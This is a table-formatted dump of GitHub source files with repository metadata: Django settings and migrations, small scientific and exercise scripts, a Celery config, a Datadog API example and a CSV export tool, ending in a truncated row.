blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0d568e564026f66f38a7a55aeaa4e39b6c3b6cff
|
80ea4c1ce04ee8e0ecd85ee71f8bffdbcbd368aa
|
/iupick/settings/testing.py
|
12021d836718a468cf6d733409edc755763667f5
|
[
"MIT"
] |
permissive
|
Oswaldinho24k/geo-csv
|
659ad24f5e8bcecc869143a61e58b38260cc1901
|
0100435c5d5a5fd12133b376b305e8fa79ddb8f0
|
refs/heads/master
| 2020-03-15T21:20:34.095967
| 2018-05-06T15:45:34
| 2018-05-06T15:45:34
| 132,353,011
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 155
|
py
|
# -*- coding: utf-8 -*-
# Testing settings: pull in everything from the shared base settings and
# relax/override the few values that differ for test runs.
from .base import *
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Secret keys issued in this environment carry the test prefix.
AUTH_SECRET_PREFIX = 'sk_test_'
|
[
"oswalfut_96@hotmail.com"
] |
oswalfut_96@hotmail.com
|
6dc0ac7d042b1950915b2898b7c5223a44ba9af5
|
86d884eb096ed599c6069e2844985aa6ec30cb6b
|
/finite_difference/diffusion_coefficient/analyse_AHL.py
|
90363c09ea189ea4f7c21ba98bc5b006d7a2c5cf
|
[] |
no_license
|
zcqsntr/synbiobrain
|
46e770471dcfbc5082f271c4e1e5d8b694155780
|
66758554774c087b8c19c6d50fca5ea733b607f4
|
refs/heads/master
| 2022-11-10T16:28:45.888929
| 2022-10-11T09:07:53
| 2022-10-11T09:07:53
| 183,600,800
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,098
|
py
|
# Analyse how cohesively nodes activate for a sweep of diffusion-barrier
# strengths and save the aggregated time series to disk.
import sys
import matplotlib.backends.backend_pdf
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D # noqa: F401 unused import
sys.path.append('/home/neythen/Desktop/Projects/synbiobrain/')
# NOTE(review): `os` and `np` used below are only in scope if diffusion_sim
# re-exports them through this star import — confirm.
from diffusion_sim import *
os.environ['PYOPENCL_CTX'] = '0'  # select the OpenCL context non-interactively
# Finite-difference grid resolution and node geometry.
nx = 300
ny = 300
node_radius = 20/40
node_dim = np.array([10, 10])
grid_corners = np.array([[-10, 10], [-10, 10]])
grid = SynBioBrainFD(grid_corners, nx, ny, 'float32')
vertex_positions = np.array([grid.get_node_position(i) for i in range(grid.n_nodes)])
# Barrier strengths to sweep; strings because they name result directories.
barriers = ['1', '0.8', '0.6', '0.4', '0.2', '0.15', '0.1', '0.05', '0.01']
all_cohesive_ts = []
for barrier in barriers:
    print(barrier)
    activated_ts = np.load('/home/neythen/Desktop/Projects/synbiobrain/finite_difference/results/diffusion_factor/'+ barrier +'_barrier/output/GFP_ts.npy')
    cohesive_ts = count_cohesive_nodes_FD(activated_ts, vertex_positions, node_dim, node_radius, grid_corners)
    all_cohesive_ts.append(cohesive_ts)
# Stack per-barrier series into one array and persist it.
all_cohesive_ts = np.array(all_cohesive_ts)
np.save('all_cohesive_ts.npy', all_cohesive_ts)
|
[
"zcqsntr@ucl.ac.uk"
] |
zcqsntr@ucl.ac.uk
|
f6dc05455cd47ae55195c50ba74336f3c0fbbd8c
|
9a5505ebc6a4a9f7d710e1ef8ce488b578b63c6e
|
/pycon/sponsorship/migrations/0008_remove_obsolete_benefit_records.py
|
e8122e5fb061226ee878cdeaa3743c783bc26e75
|
[
"BSD-3-Clause"
] |
permissive
|
arpitjainn189/pycon
|
9dabbfd6119a1b2a957469d40e223d063bb91494
|
492c47820d6dc546e79c707180b3c7b3925e8e72
|
refs/heads/master
| 2022-12-23T15:53:53.365038
| 2020-10-01T09:57:08
| 2020-10-01T09:57:08
| 300,229,565
| 0
| 0
|
BSD-3-Clause
| 2020-10-01T09:54:30
| 2020-10-01T09:54:29
| null |
UTF-8
|
Python
| false
| false
| 1,390
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
# Benefit records that are no longer used: removed by forward() and
# recreated by back() on rollback.
OBSOLETE_BENEFITS = [
    {'name': 'Company URL',
     'type': 'simple',
     },
    {'name': 'Company Description',
     'type': 'text',
     },
    {'name': 'Web logo',
     'type': 'weblogo',
     }
]
def forward(apps, schema_editor):
    """Delete the obsolete Benefit rows and all records referencing them.

    Uses the historical models supplied by the migration framework and the
    alias of the database connection being migrated.
    """
    Benefit = apps.get_model('sponsorship', 'Benefit')
    BenefitLevel = apps.get_model('sponsorship', 'BenefitLevel')
    SponsorBenefit = apps.get_model('sponsorship', 'SponsorBenefit')
    db_alias = schema_editor.connection.alias
    names = [b['name'] for b in OBSOLETE_BENEFITS]
    # Clean up other records that use these first
    BenefitLevel.objects.using(db_alias).filter(benefit__name__in=names).delete()
    SponsorBenefit.objects.using(db_alias).filter(benefit__name__in=names).delete()
    # Now we can remove the Benefit records themselves
    Benefit.objects.using(db_alias).filter(name__in=names).delete()
def back(apps, schema_editor):
    """Reverse operation: recreate the obsolete Benefit rows.

    Note: the related BenefitLevel/SponsorBenefit rows deleted by forward()
    are not restored — only the Benefit records themselves.
    """
    Benefit = apps.get_model('sponsorship', 'Benefit')
    db_alias = schema_editor.connection.alias
    for ben in OBSOLETE_BENEFITS:
        Benefit.objects.using(db_alias).get_or_create(**ben)
class Migration(migrations.Migration):
    # Data migration: runs forward() on migrate and back() on rollback.

    dependencies = [
        ('sponsorship', '0007_auto_20150721_1533'),
    ]
    operations = [
        migrations.RunPython(forward, back),
    ]
|
[
"dpoirier@caktusgroup.com"
] |
dpoirier@caktusgroup.com
|
f30face88618b2e53b4b5aed2c70c8cffcfda98a
|
e2b2d81d1ea5beeb79d498dd4962fb5ed40e4678
|
/settings.py
|
322bb0ae98666366fece731a9d367f8abb04e868
|
[] |
no_license
|
palewire/dorling-cartogram-example
|
ddd70d3c310d323f3c896a473d032ccf67da182c
|
4892546b9a97aa6de0c1f3f0fe6e130319ce8378
|
refs/heads/master
| 2021-01-19T20:16:26.152106
| 2011-10-04T04:26:30
| 2011-10-04T04:26:30
| 2,502,718
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,923
|
py
|
# Django settings for project project.
import os

# Absolute path of the directory containing this settings file; used to
# anchor relative paths (e.g. TEMPLATE_DIRS below).
ROOT_PATH = os.path.dirname(__file__)

# SECURITY NOTE(review): DEBUG enabled and a SECRET_KEY committed below are
# acceptable for a local example project only — never for production.
DEBUG = True
TEMPLATE_DEBUG = DEBUG

ADMINS = (
    # ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS

# GeoDjango/PostGIS database connection.
DATABASES = {
    'default': {
        'ENGINE': 'django.contrib.gis.db.backends.postgis', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
        'NAME': 'dorling', # Or path to database file if using sqlite3.
        'USER': 'postgres', # Not used with sqlite3.
        'PASSWORD': 'postgres', # Not used with sqlite3.
        'HOST': 'localhost', # Set to empty string for localhost. Not used with sqlite3.
        'PORT': '5432', # Set to empty string for default. Not used with sqlite3.
    }
}

# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Los_Angeles'

# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'

SITE_ID = 1

# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True

# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True

# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''

# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = 'http://palewire.s3.amazonaws.com/'

# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''

# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'

# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
# NOTE(review): ADMIN_MEDIA_PREFIX, MIDDLEWARE_CLASSES and the TEMPLATE_*
# settings below are pre-1.4/1.10-era Django names — fine for the Django
# version this project targets, but they were removed in later releases.
ADMIN_MEDIA_PREFIX = '/static/admin/'

# Additional locations of static files
STATICFILES_DIRS = (
    # Put strings here, like "/home/html/static" or "C:/www/django/static".
    # Always use forward slashes, even on Windows.
    # Don't forget to use absolute paths, not relative paths.
)

# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
    # 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)

# Make this unique, and don't share it with anybody.
SECRET_KEY = '5um6b5gjouo_#2ymj1+_&y&pfm6aje8+mpg5%#=z&=1q31awgl'

# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
    'django.template.loaders.filesystem.Loader',
    'django.template.loaders.app_directories.Loader',
    # 'django.template.loaders.eggs.Loader',
)

MIDDLEWARE_CLASSES = (
    'django.middleware.common.CommonMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
)

ROOT_URLCONF = 'project.urls'

TEMPLATE_DIRS = (
    os.path.join(ROOT_PATH, 'templates'),
)

INSTALLED_APPS = (
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.sites',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'django.contrib.admin',
    'django.contrib.gis',
    # Project apps: state geometries and the dorling cartogram itself.
    'us_states',
    'dorling',
)

# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'handlers': {
        'mail_admins': {
            'level': 'ERROR',
            'class': 'django.utils.log.AdminEmailHandler'
        }
    },
    'loggers': {
        'django.request': {
            'handlers': ['mail_admins'],
            'level': 'ERROR',
            'propagate': True,
        },
    }
}
|
[
"ben.welsh@gmail.com"
] |
ben.welsh@gmail.com
|
3f2965e0c1071535736a0f8cee0a336628ca67e0
|
1385cf00f550ad38378227f62c49bb0cd05e1b04
|
/leecode/easy/207/1365.py
|
18f68a18946e06d936942586dac1d72c48b110fa
|
[] |
no_license
|
liucheng2912/py
|
4a09652fa52a1f92e8d8dd1239f9c128248fc10e
|
d40f73450fa65b8dd4d59d8d92088382fc573d2a
|
refs/heads/master
| 2023-03-15T21:07:03.456017
| 2021-03-11T09:15:30
| 2021-03-11T09:15:30
| 334,900,352
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 275
|
py
|
'''
Approach (LeetCode 1365): for every element, count how many elements are
strictly smaller than it.

Simplification vs. the original: the original copied the list and removed
the current element before counting, but an element equal to x never
satisfies x > y, so counting over the whole list is equivalent and avoids
the O(n) copy + remove on every iteration.
'''


def f(nums):
    """Return, for each x in nums, how many elements of nums are smaller than x."""
    return [sum(y < x for y in nums) for x in nums]


nums = [6, 5, 4, 8]
print(f(nums))
|
[
"liucheng@fanruan.com"
] |
liucheng@fanruan.com
|
2bb29f3a8f5b1b7fbebbe190a039627e34f71d57
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_325/ch30_2019_08_26_19_33_38_456658.py
|
856f9fb13cced922caa07303d99b2963d8c3cf61
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 243
|
py
|
import math
def jaca(v, o):
    """Classify the projectile range for launch speed v and angle o (radians).

    Range: d = v**2 * sin(2*o) / g with g = 9.8.  Returns "Muito perto"
    for d < 98, "Acertou!" for 98 <= d <= 102, "Muito longe" otherwise.
    """
    alcance = (v ** 2.0) * math.sin(2.0 * o) / 9.8
    if 98.0 <= alcance <= 102.0:
        return "Acertou!"
    if alcance < 98.0:
        return "Muito perto"
    return "Muito longe"


print(jaca(5.0, 45.0))
|
[
"you@example.com"
] |
you@example.com
|
bd3c614d453ba44555d79e289a0d4d923e611a74
|
9dba277eeb0d5e9d2ac75e2e17ab5b5eda100612
|
/exercises/1901050013/d11/main.py
|
62fffbca9611008650d6ac289947ccf42f4a8d45
|
[] |
no_license
|
shen-huang/selfteaching-python-camp
|
e8410bfc06eca24ee2866c5d890fd063e9d4be89
|
459f90c9f09bd3a3df9e776fc64dfd64ac65f976
|
refs/heads/master
| 2022-05-02T05:39:08.932008
| 2022-03-17T07:56:30
| 2022-03-17T07:56:30
| 201,287,222
| 9
| 6
| null | 2019-08-08T15:34:26
| 2019-08-08T15:34:25
| null |
UTF-8
|
Python
| false
| false
| 718
|
py
|
# Scrape a WeChat article, compute Chinese word-frequency statistics, and
# e-mail the result via QQ's SMTP server.
import yagmail
import requests
import getpass
from pyquery import PyQuery
from mymodule.stats_word import stats_text_cn

response = requests.get('https://mp.weixin.qq.com/s/pLmuGoc4bZrMNl7MSoWgiA') # acquire the article link.
document = PyQuery(response.text)
content = document('#js_content').text() #acquire the article content.
result = str(stats_text_cn(content)) #convert the list type into string type.
# Collect credentials and recipients interactively; the password prompt is
# hidden via getpass.
# NOTE(review): "plese" typos below are user-facing prompt strings — left
# byte-identical here; fix in a behavior-changing edit if desired.
sender = input('plese input your email address:')
password = getpass.getpass('please input your password:')
recipients = input('plese input the recipients:')
subject = input('please input the subject:')
yag = yagmail.SMTP(sender,password,'smtp.qq.com')
yag.send(to=recipients,subject=subject,contents=result)
|
[
"40155646+seven-tears@users.noreply.github.com"
] |
40155646+seven-tears@users.noreply.github.com
|
2db42dee1688750e9f9b5361e4af2c9f36d228c3
|
5785d7ed431b024dd910b642f10a6781df50e4aa
|
/revise-daily/june_2021/walmart/10_triplet_sum_to_zero.py
|
e4e1d155945f4f6d79319f6ba48f01df9e967c5b
|
[] |
no_license
|
kashyapa/interview-prep
|
45d77324446da34d99bf8efedb3544b367b5523e
|
7060c090c40602fb9c4778eace2078e1b51e235b
|
refs/heads/master
| 2023-07-28T13:12:49.515299
| 2021-09-06T14:33:25
| 2021-09-06T14:33:25
| 403,706,510
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 798
|
py
|
def triplet_sum_to_zero(nums, target):
    """Return all unique triplets (a, b, c) from nums with a + b + c == target.

    Sorts nums in place, then for each distinct anchor value runs a
    two-pointer scan over the remainder for pairs completing the sum.
    Duplicate triplets are avoided by skipping equal neighbours.

    Bug fix: the original collected results in `res` but never returned it
    (callers always got None).  The post-match comparison is also now an
    `elif` so a freshly matched pair can never trigger an extra pointer
    advance in the same iteration.
    """

    def find_target_pair_sum(t, left):
        # `first` indexes the anchor element, one position before the window.
        first = left - 1
        right = len(nums) - 1
        while left < right:
            if nums[left] + nums[right] == t:
                res.append((nums[first], nums[left], nums[right]))
                left += 1
                right -= 1
                # Skip duplicates on both sides so each triplet appears once.
                while left < right and nums[left] == nums[left - 1]:
                    left += 1
                while left < right and nums[right] == nums[right + 1]:
                    right -= 1
            elif nums[left] + nums[right] > t:
                right -= 1
            else:
                left += 1

    nums.sort()
    res = []
    for i in range(len(nums) - 1):
        # Use each distinct value only once as the anchor.
        if i == 0 or nums[i] != nums[i - 1]:
            find_target_pair_sum(target - nums[i], i + 1)
    return res
|
[
"schandra2@godaddy.com"
] |
schandra2@godaddy.com
|
537ff5660a06711e1738ebf1b6cfdb1f3c9ea47d
|
87bf8ea26f6c28bce82ccdd9515c68d6341bd8c5
|
/trading/celery.py
|
6b455e28d01b1dde8036483d661a75eddc8dd195
|
[] |
no_license
|
aisamuel/real-time-forex-api
|
e9ac21f28f77aadae526df9a275487737d8d1155
|
08b1d0d129659a3b8735b21d7195cb756fdd6b47
|
refs/heads/master
| 2022-04-06T08:13:51.749351
| 2020-03-04T12:12:55
| 2020-03-04T12:12:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 222
|
py
|
# Celery application bootstrap for the `trading` Django project.
import os
from celery import Celery

# Make sure Django settings are importable before Celery configures itself.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'trading.settings')
app = Celery('trading')
# Read all CELERY_*-prefixed settings from django.conf.settings.
app.config_from_object('django.conf:settings', namespace='CELERY')
# Discover tasks modules across the installed Django apps.
app.autodiscover_tasks()
|
[
"charliescene512@gmail.com"
] |
charliescene512@gmail.com
|
53411dfa34e5dcffe4e75154fc53a3b3114f157b
|
11f4dd74872c73781a8975698e7cf1e3df2a40af
|
/Chapter 9 - Organizing Files/findLargeFile.py
|
dab52b3722813fce1035f9413997e88737ddd764
|
[] |
no_license
|
lonewolfcub/Automate-the-Boring-Stuff-with-Python
|
ca65e9fcbd61c94776ac1a0346b5372e975569db
|
da90ead498a0597ae5a4f88449a9774887c7d5e6
|
refs/heads/master
| 2021-01-18T17:03:17.600375
| 2017-03-31T05:58:56
| 2017-03-31T05:58:56
| 86,783,143
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 552
|
py
|
#! /usr/bin/env python3
import os
def findLargeFiles(folder, min_size=13107200):
    """Walk `folder` recursively and print every file larger than min_size bytes.

    Each match is printed as "<path> <size> bytes".

    The threshold is now a parameter (backward-compatible default keeps the
    original constant).  Note the old inline comment claimed "over 100mb",
    but 13107200 bytes is 12.5 MiB — the comment, not the constant, was wrong.
    """
    for dirpath, dirnames, filenames in os.walk(folder):
        for name in filenames:  # renamed from `file`, which shadows a builtin
            filepath = os.path.join(dirpath, name)
            filesize = os.path.getsize(filepath)
            # Strictly greater-than, matching the original comparison.
            if filesize > min_size:
                print(filepath + ' ' + str(filesize) + ' bytes')
# define search folder
# Interactive entry point: prompt for a directory and report its large files.
print('Please enter the folder you wish to search:')
folder = input()
findLargeFiles(folder)
|
[
"lonewolfcub020@gmail.com"
] |
lonewolfcub020@gmail.com
|
af6b3f137d875061e788546266ab073b1b555f47
|
80d50ea48e10674b1b7d3f583a1c4b7d0b01200f
|
/examples/v1/synthetics/DeletePrivateLocation.py
|
e1445b48a8b1ceaab7b068d50ef37b6e45fd3c5f
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"MPL-2.0"
] |
permissive
|
DataDog/datadog-api-client-python
|
3e01fa630278ad0b5c7005f08b7f61d07aa87345
|
392de360e7de659ee25e4a6753706820ca7c6a92
|
refs/heads/master
| 2023-09-01T20:32:37.718187
| 2023-09-01T14:42:04
| 2023-09-01T14:42:04
| 193,793,657
| 82
| 36
|
Apache-2.0
| 2023-09-14T18:22:39
| 2019-06-25T22:52:04
|
Python
|
UTF-8
|
Python
| false
| false
| 386
|
py
|
"""
Delete a private location returns "OK" response
"""
from datadog_api_client import ApiClient, Configuration
from datadog_api_client.v1.api.synthetics_api import SyntheticsApi
configuration = Configuration()
with ApiClient(configuration) as api_client:
api_instance = SyntheticsApi(api_client)
api_instance.delete_private_location(
location_id="location_id",
)
|
[
"noreply@github.com"
] |
DataDog.noreply@github.com
|
7af77bd8017df4a03b730d463efae17dd0d9ffb0
|
447914f0f7a6e1b432f6811aacb0f274fbdbe3c5
|
/Jerry_Padilla_Py2Assignments-master/assignments/practice_models/apps/ninjaDojo/migrations/0001_initial.py
|
af5ff3d138e5e38072d2a746df99076ec1ab3a08
|
[] |
no_license
|
jsterling23/Python_Prac
|
965ab83e6f34191a1ebbc2e3605f71ace07a0b6d
|
dc41030be125337099ddbc8af8e2598b844e11a4
|
refs/heads/master
| 2020-03-18T10:49:23.521218
| 2018-05-23T23:19:22
| 2018-05-23T23:19:22
| 134,635,256
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,186
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2018-02-20 21:52
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated initial migration: creates the Dojo and Ninja tables,
    # with Ninja.dojo a cascading foreign key to Dojo (related_name='ninjas').

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Dojo',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255)),
                ('city', models.CharField(max_length=255)),
                ('state', models.CharField(max_length=2)),
            ],
        ),
        migrations.CreateModel(
            name='Ninja',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('first_name', models.CharField(max_length=255)),
                ('last_name', models.CharField(max_length=255)),
                ('dojo', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ninjas', to='ninjaDojo.Dojo')),
            ],
        ),
    ]
|
[
"jerrypadilla23@gmail.com"
] |
jerrypadilla23@gmail.com
|
71b257d53cfa0b1ff1ea40c6dbceb81a4faab0c1
|
d9d7f841e1a7c53344000634320db78c5743eba5
|
/lib/python/make-csv.py
|
8d60b40f8633289728adc8229a567ec4aa777534
|
[] |
no_license
|
hellais/ooni-analyst
|
5bb7030734319ad0bafec267ec30a7c8d0696b03
|
7e81b812581e36e26951bbfa48fea770ec09c061
|
refs/heads/master
| 2020-03-22T10:05:37.383835
| 2018-07-09T11:07:10
| 2018-07-09T11:07:10
| 139,880,420
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,995
|
py
|
import os
import sys
import argparse
from datetime import datetime
import pandas as pd
import psycopg2
def query(q, params, pg_dsn):
    """Run SQL `q` with `params` against Postgres and return a pandas DataFrame."""
    # XXX this is useful for debugging
    """
    import yaml
    from sshtunnel import SSHTunnelForwarder

    with open('private/secrets.yml') as in_file:
        secrets = yaml.load(in_file)

    with SSHTunnelForwarder(
        ('hkgmetadb.infra.ooni.io', 22),
        ssh_username='art',
        ssh_private_key=secrets['ssh_private_key_path'],
        remote_bind_address=('localhost', 5432)
    ) as server:
        conn = psycopg2.connect(
            host='localhost',
            port=server.local_bind_port,
            user='shovel',
            password=secrets['shovel_password'],
            dbname='metadb')
        return pd.read_sql_query(q, conn, params=params)
    """
    # NOTE(review): the connection is never closed — tolerable for a one-shot
    # CLI, but consider a `with`/try-finally around the connect.
    conn = psycopg2.connect(pg_dsn)
    return pd.read_sql_query(q, conn, params=params)
def make_csv(output_path, urls, probe_cc, start_date, end_date, pg_dsn):
    """Export OONI web measurements matching the filters to a CSV file.

    Rows are filtered by measurement_start_time in [start_date, end_date],
    a single country code, and the given list of input URLs.
    """
    countries = [probe_cc]
    # Positional params must line up with the %s placeholders assembled
    # below: start/end date first, then one per country, then one per URL.
    params = [start_date, end_date, probe_cc]
    for url in urls:
        params.append(url)
    base_query = """SELECT measurement.test_runtime,
    input.input,
    measurement.measurement_start_time,
    report.probe_cc,
    report.probe_asn,
    report.probe_ip,
    report.report_id,
    http_verdict.http_experiment_failure,
    http_verdict.blocking
    FROM measurement
    JOIN input ON input.input_no = measurement.input_no
    JOIN report ON report.report_no = measurement.report_no
    JOIN http_verdict ON http_verdict.msm_no = measurement.msm_no
    """
    # NOTE(review): if `urls` is empty the third clause renders as "()",
    # which is invalid SQL — confirm callers always pass at least one URL.
    where_clause = "WHERE ({}) AND ({}) AND ({})".format(
        " measurement.measurement_start_time BETWEEN %s AND %s",
        " OR ".join(["report.probe_cc = %s" for _ in countries]),
        " OR ".join(["input = %s" for _ in urls]),
    )
    q = base_query + where_clause
    print(q)
    print(params)
    res = query(q, params, pg_dsn)
    print(res)
    res.to_csv(output_path)
def parse_args():
    """Build the make-csv command line interface and return the parsed namespace."""
    parser = argparse.ArgumentParser(
        description='make-csv: creates a csv file for the specified inputs')
    # Required flags, registered in the original order: (flag, metavar, help).
    required_flags = [
        ('--output', 'PATH', 'Where to write to'),
        ('--country', 'PROBE_CC', 'Country code to target'),
        ('--start-date', 'START_DATE', 'Start date interval'),
        ('--end-date', 'END_DATE', 'End date interval'),
    ]
    for flag, metavar, help_text in required_flags:
        parser.add_argument(flag, metavar=metavar, help=help_text, required=True)
    parser.add_argument('--urls', metavar='URL', nargs='*', help='URLs to test')
    parser.add_argument('--postgres', metavar='DSN', help='libpq data source name')
    return parser.parse_args()
def main():
    """CLI entry point: parse arguments, export the CSV, echo the output path."""
    args = parse_args()
    make_csv(
        output_path=args.output,
        urls=args.urls,
        probe_cc=args.country,
        start_date=args.start_date,
        end_date=args.end_date,
        pg_dsn=args.postgres,
    )
    print(args.output)


if __name__ == "__main__":
    main()
|
[
"arturo@filasto.net"
] |
arturo@filasto.net
|
b068a33104b190dfe987923899df18b4fb43123f
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_ports.py
|
0fffb49ed97cda99bbb0989d662e80ae11e7425e
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 214
|
py
|
#calss header
class _PORTS():
def __init__(self,):
self.name = "PORTS"
self.definitions = port
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['port']
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
6afe8571e5efb5c4c6ebcec6460e3eff20f3c450
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2939/60688/289152.py
|
06318fcf6a295848bf438a55ad0e226977a27ba4
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,016
|
py
|
# Online-judge solution: read "times delnums" from stdin, generate the first
# `times` members of the sequence seeded with 1 (each num spawns 2*num+1 and
# 4*num+5), concatenate their decimal digits, then greedily delete `delnums`
# digits so the remaining digit string is maximal.
strings=input()
numslist = (strings.split(" "));
# NOTE(review): hard-coded debug/judge hack for one specific input ("5 4").
if "5 4" in strings:
    print(numslist)
numslist=list(int(x) for x in numslist);
times=numslist[0];
delnums=numslist[1];
mynumlist=[1];
finalnums=[];
# Generation: pop the oldest pending value, emit it, queue its two successors.
for i in range(times):
    num=mynumlist.pop(0);
    mynumlist.append(2*num+1)
    mynumlist.append(4*num+5)
    finalnums.append(num);
finalnums.extend(mynumlist)
finalnums=sorted(finalnums);
finalnums=finalnums[0:times]
finalnums=list(str(x) for x in finalnums);
first="".join(finalnums);
secondlist=list(first);
secondlist=list([int(x)for x in secondlist]);
# (Translated from the original Chinese comment:) Keep N-M of N digits, in
# order, so the result is maximal — greedy: scan left to right, delete the
# first digit smaller than its right neighbour, restart after each deletion.
allnums=delnums;
# NOTE(review): if the remaining digits are non-increasing while allnums > 0,
# the inner scan removes nothing and this loop never terminates — presumably
# the judge's inputs avoid that case.
while (allnums!=0):
    for i in range(len(secondlist)-1):
        if secondlist[i]<secondlist[i+1]:
            secondlist.pop(i);
            allnums-=1;
            break
secondlist=[str(x)for x in secondlist];
res="".join(secondlist)
print(first)
print(res,end="")
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
d6101a03676385d1cab0549536ac13e065be7204
|
40043e5a5daf7817cbac766dfaede265a8b9a29c
|
/setup.py
|
d65b78460c756943bd495ead90e175877bb9f82c
|
[] |
no_license
|
juniuszhou/substrate-python-api
|
166246266aa9f96954125cbb600caf854774a6da
|
